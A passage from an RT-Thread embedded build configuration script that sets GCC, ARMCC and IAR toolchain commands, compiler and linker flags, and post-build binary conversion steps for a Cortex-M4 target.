PREFIX = 'arm-none-eabi-'
CC = PREFIX + 'gcc'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
CXX = PREFIX + 'g++'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'elf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcpu=cortex-m4 -mthumb -mfpu=fpv4-sp-d16 -mfloat-abi=hard -ffunction-sections -fdata-sections'
CFLAGS = DEVICE + ' -Dgcc'
AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp -Wa,-mimplicit-it=thumb '
LFLAGS = DEVICE + ' -Wl,--gc-sections,-Map=rt-thread.map,-cref,-u,Reset_Handler -T board/linker_scripts/link.lds'
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -gdwarf-2 -g'
AFLAGS += ' -gdwarf-2'
else:
CFLAGS += ' -O2'
CXXFLAGS = CFLAGS
POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n'
elif PLATFORM == 'armcc':
# toolchains
CC = 'armcc'
CXX = 'armcc'
AS = 'armasm'
AR = 'armar'
LINK = 'armlink'
TARGET_EXT = 'axf'
DEVICE = ' --cpu Cortex-M4.fp '
CFLAGS = '-c ' + DEVICE + ' --apcs=interwork --c99'
AFLAGS = DEVICE + ' --apcs=interwork '
LFLAGS = DEVICE + ' --info sizes --info totals --info unused --info veneers --list rt-thread.map --strict --scatter "board\linker_scripts\link.sct"'
CFLAGS += ' -I' + EXEC_PATH + '/ARM/ARMCC/include'
LFLAGS += ' --libpath=' + EXEC_PATH + '/ARM/ARMCC/lib'
CFLAGS += ' -D__MICROLIB '
AFLAGS += ' --pd "__MICROLIB SETA 1" '
LFLAGS += ' --library_type=microlib '
EXEC_PATH += '/ARM/ARMCC/bin/'
if BUILD == 'debug':
CFLAGS += ' -g -O0'
AFLAGS += ' -g'
else:
CFLAGS += ' -O2'
CXXFLAGS = CFLAGS
CFLAGS += ' -std=c99'
POST_ACTION = 'fromelf --bin $TARGET --output rtthread.bin \nfromelf -z $TARGET'
elif PLATFORM == 'iar':
# toolchains
CC = 'iccarm'
CXX = 'iccarm'
AS = 'iasmarm'
AR = 'iarchive'
LINK = 'ilinkarm'
TARGET_EXT = 'out'
DEVICE = '-Dewarm'
CFLAGS = DEVICE
CFLAGS += ' --diag_suppress Pa050'
CFLAGS += ' --no_cse'
CFLAGS += ' --no_unroll'
CFLAGS += ' --no_inline'
CFLAGS += ' --no_code_motion'
CFLAGS += ' --no_tbaa'
CFLAGS += ' --no_clustering'
CFLAGS += ' --no_scheduling'
CFLAGS += ' --endian=little'
CFLAGS += ' --cpu=Cortex-M4'
CFLAGS += ' -e'
CFLAGS += ' --fpu=VFPv4_sp'
CFLAGS += ' --dlib_config "' + EXEC_PATH + '/arm/INC/c/DLib_Config_Normal.h"'
CFLAGS += ' --silent'
AFLAGS = DEVICE
AFLAGS += ' -s+'
AFLAGS += ' -w+'
AFLAGS += ' -r'
AFLAGS += ' --cpu Cortex-M4'
AFLAGS += ' --fpu VFPv4_sp'
AFLAGS += ' -S'
if BUILD == 'debug':
CFLAGS += ' --debug'
CFLAGS += ' -On'
else:
CFLAGS += ' -Oh'
LFLAGS = ' --config "board/linker_scripts/link.icf"'
LFLAGS += ' --entry __iar_program_start'
CXXFLAGS = CFLAGS
EXEC_PATH = EXEC_PATH + '/arm/bin/'
POST_ACTION = 'ielftool --bin $TARGET rtthread.bin'
def dist_handle(BSP_ROOT, dist_dir):
import sys
cwd_path = os.getcwd()
sys.path.append(os.path.join(os.path.dirname(BSP_ROOT), 'tools'))
from sdk_dist import dist_do_building
dist_do_building(BSP_ROOT, dist_dir)
|
apache-2.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.